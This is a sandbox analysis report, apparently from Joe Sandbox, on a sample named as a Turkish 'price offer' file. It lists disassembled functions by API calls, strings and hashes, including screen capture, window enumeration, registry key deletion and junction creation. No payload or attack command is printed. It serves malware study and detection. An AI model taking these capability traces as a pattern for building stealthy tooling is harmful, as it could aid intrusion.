Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: b47834a187a79b69e14ebab38fb8e0af2faa30dac717f94934f034e8aea782e6
Instruction ID: a1e8665b3091694670089d61fcf8b32fffeac5c967a36f1b2475cf32d76e1f53
Opcode Fuzzy Hash: b47834a187a79b69e14ebab38fb8e0af2faa30dac717f94934f034e8aea782e6
Instruction Fuzzy Hash: 7AC19B30218205AFD710DF24D594F2ABBE5BF84358F14859CF59A8B3A2CB71EC46CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A0255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00A025D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00A025E8
CreateCompatibleDC.GDI32(?), ref: 00A025F4
SelectObject.GDI32(00000000,?), ref: 00A02601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00A0266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00A026AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00A026D0
SelectObject.GDI32(?,?), ref: 00A026D8
DeleteObject.GDI32(?), ref: 00A026E1
DeleteDC.GDI32(?), ref: 00A026E8
ReleaseDC.USER32(00000000,?), ref: 00A026F3

Strings

(, xrefs: 00A0268D

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 85de4c69521a24c65aba6f5c1cb198e9815b808c1846fcd2747f72f5674af455
Instruction ID: 4c4a628ea9b7042192d51e11704f1b6dea1892a8458bdc97997c443dd9968cee
Opcode Fuzzy Hash: 85de4c69521a24c65aba6f5c1cb198e9815b808c1846fcd2747f72f5674af455
Instruction Fuzzy Hash: DE61E275D00219EFCF14CFE8D988AAEBBB6FF48310F208529E955A7250E771A941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 009BDA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 009BDAA1

Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD659
Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD66B
Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD67D
Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD68F
Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD6A1
Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD6B3
Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD6C5
Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD6D7
Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD6E9
Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD6FB
Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD70D
Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD71F
Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD731

_free.LIBCMT ref: 009BDA96

Part of subcall function 009B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000), ref: 009B29DE
Part of subcall function 009B29C8: GetLastError.KERNEL32(00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000,00000000), ref: 009B29F0

_free.LIBCMT ref: 009BDAB8
_free.LIBCMT ref: 009BDACD
_free.LIBCMT ref: 009BDAD8
_free.LIBCMT ref: 009BDAFA
_free.LIBCMT ref: 009BDB0D
_free.LIBCMT ref: 009BDB1B
_free.LIBCMT ref: 009BDB26
_free.LIBCMT ref: 009BDB5E
_free.LIBCMT ref: 009BDB65
_free.LIBCMT ref: 009BDB82
_free.LIBCMT ref: 009BDB9A

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: c7a7fd6da2eb2319b5e400021d0ef3aaa05c0b90009afa00cf6407e0e07b0b1f
Instruction ID: 30ec507caf4286e6a812f6faa8bf419d3f154f90d269ce75b92ea83dcb285219
Opcode Fuzzy Hash: c7a7fd6da2eb2319b5e400021d0ef3aaa05c0b90009afa00cf6407e0e07b0b1f
Instruction Fuzzy Hash: 72312831606605AFEB21AB79EA45BDAB7EDFF40330F154829E449D7191EF31ED808B24

Uniqueness

Uniqueness Score: -1.00%

Function 009E365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 009E369C
_wcslen.LIBCMT ref: 009E36A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 009E3797
GetClassNameW.USER32(?,?,00000400), ref: 009E380C
GetDlgCtrlID.USER32(?), ref: 009E385D
GetWindowRect.USER32(?,?), ref: 009E3882
GetParent.USER32(?), ref: 009E38A0
ScreenToClient.USER32(00000000), ref: 009E38A7
GetClassNameW.USER32(?,?,00000100), ref: 009E3921
GetWindowTextW.USER32(?,?,00000400), ref: 009E395D

Strings

%s%u, xrefs: 009E3734

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 69b3520d5898499c3210b86e7a1ad2ce2e8ec701888e630b58455f1618aac3e6
Instruction ID: ac6b6350fa0353cd7f3029b71a034a40ff210fa460c7a078e45cf53fcbb8de42
Opcode Fuzzy Hash: 69b3520d5898499c3210b86e7a1ad2ce2e8ec701888e630b58455f1618aac3e6
Instruction Fuzzy Hash: 3A91A071204646EFD71ADF66C889BAAB7A8FF44350F00C529F9A9C3191DB30EE45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 009E4954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 009E4994
GetWindowTextW.USER32(?,?,00000400), ref: 009E49DA
_wcslen.LIBCMT ref: 009E49EB
CharUpperBuffW.USER32(?,00000000), ref: 009E49F7
_wcsstr.LIBVCRUNTIME ref: 009E4A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 009E4A64
GetWindowTextW.USER32(?,?,00000400), ref: 009E4A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 009E4AE6
GetClassNameW.USER32(?,?,00000400), ref: 009E4B20
GetWindowRect.USER32(?,?), ref: 009E4B8B

Strings

ThumbnailClass, xrefs: 009E4A6F, 009E4AF1

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 2ee9fa015cb92a49bb2446fcb8470ff7d200352234872dbcdede52d914476d5f
Instruction ID: d9cf090dc9a01967350dce8eaa3b0c120a16262f2536d0d4a5665ac4becef344
Opcode Fuzzy Hash: 2ee9fa015cb92a49bb2446fcb8470ff7d200352234872dbcdede52d914476d5f
Instruction Fuzzy Hash: CA91ED310083459FDB06CF16C885BAA77ECFF84324F088469FD859A196EB34ED46CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A18D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00999BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00999BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00A18D5A
GetFocus.USER32 ref: 00A18D6A
GetDlgCtrlID.USER32(00000000), ref: 00A18D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00A18E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00A18ECF
GetMenuItemCount.USER32(?), ref: 00A18EEC
GetMenuItemID.USER32(?,00000000), ref: 00A18EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00A18F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00A18F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A18FA1

Strings

0, xrefs: 00A18E9F

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: 80f7bf22bd1890f6d334009295ea1768e4dc2b313cf2ac0c9f8ddeb00746bf4c
Instruction ID: 197002c9c7f7b3f410161977bbb97d72c60eeccec577ed89b7e0db0a45f20c1f
Opcode Fuzzy Hash: 80f7bf22bd1890f6d334009295ea1768e4dc2b313cf2ac0c9f8ddeb00746bf4c
Instruction Fuzzy Hash: 8581AE715083019FDB10CF24D884AEBBBEAFB88764F14491DF99597291DB38D982CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 009EDC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 009EDC20
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 009EDC46
_wcslen.LIBCMT ref: 009EDC50
_wcsstr.LIBVCRUNTIME ref: 009EDCA0
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 009EDCBC

Strings

%u.%u.%u.%u, xrefs: 009EDD9A
\VarFileInfo\Translation, xrefs: 009EDCB4
StringFileInfo\, xrefs: 009EDC8F
04090000, xrefs: 009EDCF2
DefaultLangCodepage, xrefs: 009EDD1F

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: 4bb503656f763d405b925b1974675cf7620086e9b8f7b1a86d1d671724347afb
Instruction ID: 41c82b6582395bf038380cf661a63544d374b8081d10ccf499e3effb701d7c99
Opcode Fuzzy Hash: 4bb503656f763d405b925b1974675cf7620086e9b8f7b1a86d1d671724347afb
Instruction Fuzzy Hash: 5C412172A442107ADB01ABA59C07FFF77ACEF82760F140469F900E61C2EB749E4187A5

Uniqueness

Uniqueness Score: -1.00%

Function 00A0CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00A0CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00A0CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00A0CD48

Part of subcall function 00A0CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00A0CCAA
Part of subcall function 00A0CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00A0CCBD
Part of subcall function 00A0CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A0CCCF
Part of subcall function 00A0CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00A0CD05
Part of subcall function 00A0CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00A0CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 00A0CCF3

Strings

advapi32.dll, xrefs: 00A0CCB8
RegDeleteKeyExW, xrefs: 00A0CCC9

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: fa36f555cef2d3761ad55585947289892d9ccbdf7a30991991d1c78f30ec6858
Instruction ID: 09200a48c1ae507b35f717ebc0c67e0cefd250f035aa41f6a8fa759bc9503a03
Opcode Fuzzy Hash: fa36f555cef2d3761ad55585947289892d9ccbdf7a30991991d1c78f30ec6858
Instruction Fuzzy Hash: 6931607194112DBBD720CB94EC88EFFBB7CEF45760F004265A905E3190D7349E469AA0

Uniqueness

Uniqueness Score: -1.00%

Function 009F3D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 009F3D40
_wcslen.LIBCMT ref: 009F3D6D
CreateDirectoryW.KERNEL32(?,00000000), ref: 009F3D9D
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 009F3DBE
RemoveDirectoryW.KERNEL32(?), ref: 009F3DCE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 009F3E55
CloseHandle.KERNEL32(00000000), ref: 009F3E60
CloseHandle.KERNEL32(00000000), ref: 009F3E6B

Strings

\??\%s, xrefs: 009F3D5B
\, xrefs: 009F3D77
:, xrefs: 009F3D82

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: 3b5bb0d1b18dfdd2b203b8fd284ee1b3517eb4ebbdd3462030a43f69242c3b62
Instruction ID: 4f963ac921f70756502b45fb12b67b205c3c2b0c1134f0c336227e79dcf82015
Opcode Fuzzy Hash: 3b5bb0d1b18dfdd2b203b8fd284ee1b3517eb4ebbdd3462030a43f69242c3b62
Instruction Fuzzy Hash: FC31CF72940219ABDB20DBA0DC49FEF77BCEF89750F1080A5FA09D60A0EB7497458B64

Uniqueness

Uniqueness Score: -1.00%

Function 009EE6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 009EE6B4

Part of subcall function 0099E551: timeGetTime.WINMM(?,?,009EE6D4), ref: 0099E555

Sleep.KERNEL32(0000000A), ref: 009EE6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 009EE705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 009EE727
SetActiveWindow.USER32 ref: 009EE746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 009EE754
SendMessageW.USER32(00000010,00000000,00000000), ref: 009EE773
Sleep.KERNEL32(000000FA), ref: 009EE77E
IsWindow.USER32 ref: 009EE78A
EndDialog.USER32(00000000), ref: 009EE79B

Strings

BUTTON, xrefs: 009EE719

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 4b1e03946bb45c43720d473f67c9f6c1df30f699a61b5cd0b5ffc6d15a3ce8fe
Instruction ID: 4eaff46b1ed4e9f13dfe662e866520048c55eeee75e634979631e1d819b6d0c7
Opcode Fuzzy Hash: 4b1e03946bb45c43720d473f67c9f6c1df30f699a61b5cd0b5ffc6d15a3ce8fe
Instruction Fuzzy Hash: A12196B0280385AFEB02DFE1EC89B753B6EF75576AF105434F415825A1DB769C028B15

Uniqueness

Uniqueness Score: -1.00%

Function 009EE9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 009EEA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 009EEA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009EEA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 009EEA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 009EEAA7

Strings

close PlayMe, xrefs: 009EEA6E, 009EEA9B
play PlayMe, xrefs: 009EEAA2
open , xrefs: 009EEA0C
status PlayMe mode, xrefs: 009EEA58
alias PlayMe, xrefs: 009EEA36
play PlayMe wait, xrefs: 009EEA91

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: c3146e287ca4018259a278094615055f4312c80f4be5afce83f8ea235c8a129f
Instruction ID: db2026191a91c121b60de6150c08a35b8678bb04d3415c5f4e391984275b7b74
Opcode Fuzzy Hash: c3146e287ca4018259a278094615055f4312c80f4be5afce83f8ea235c8a129f
Instruction Fuzzy Hash: F0115135A9026979D721B7A2DC4AEFF6A7CFBD2F00F440829B411A21D1EAB00E05C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 009E5CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 009E5CE2
GetWindowRect.USER32(00000000,?), ref: 009E5CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 009E5D59
GetDlgItem.USER32(?,00000002), ref: 009E5D69
GetWindowRect.USER32(00000000,?), ref: 009E5D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 009E5DCF
GetDlgItem.USER32(?,000003E9), ref: 009E5DDD
GetWindowRect.USER32(00000000,?), ref: 009E5DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 009E5E31
GetDlgItem.USER32(?,000003EA), ref: 009E5E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 009E5E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 009E5E67

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: f6d8c478b88f8c11b01f32e1ee66d094d3974110102987a9f16a0a33e34a5c9d
Instruction ID: 43a9ee7e8bb19f313d2f21c8292ab9fe8956b7242fd428e94b68206a009e59e5
Opcode Fuzzy Hash: f6d8c478b88f8c11b01f32e1ee66d094d3974110102987a9f16a0a33e34a5c9d
Instruction Fuzzy Hash: 4D513F70B40605AFDF19CFA9CD89AAEBBB9FB48314F158129F515E7290D7709E01CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00998BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00998F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00998BE8,?,00000000,?,?,?,?,00998BBA,00000000,?), ref: 00998FC5

DestroyWindow.USER32(?), ref: 00998C81
KillTimer.USER32(00000000,?,?,?,?,00998BBA,00000000,?), ref: 00998D1B
DestroyAcceleratorTable.USER32(00000000), ref: 009D6973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00998BBA,00000000,?), ref: 009D69A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00998BBA,00000000,?), ref: 009D69B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00998BBA,00000000), ref: 009D69D4
DeleteObject.GDI32(00000000), ref: 009D69E6

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 29c58d553560ba4ef579a6560a0f93492ada902c3360fdaa2657cde9da7f5f34
Instruction ID: 94d8658e2edee96434ca6418f57cc028799c91799d93891b761d5bf4cf7b1ca6
Opcode Fuzzy Hash: 29c58d553560ba4ef579a6560a0f93492ada902c3360fdaa2657cde9da7f5f34
Instruction Fuzzy Hash: BF618C30542700DFCF21DF68D958B6677F5FB46322F14891DE0829BAA0CB75AD82CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00999838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00999944: GetWindowLongW.USER32(?,000000EB), ref: 00999952

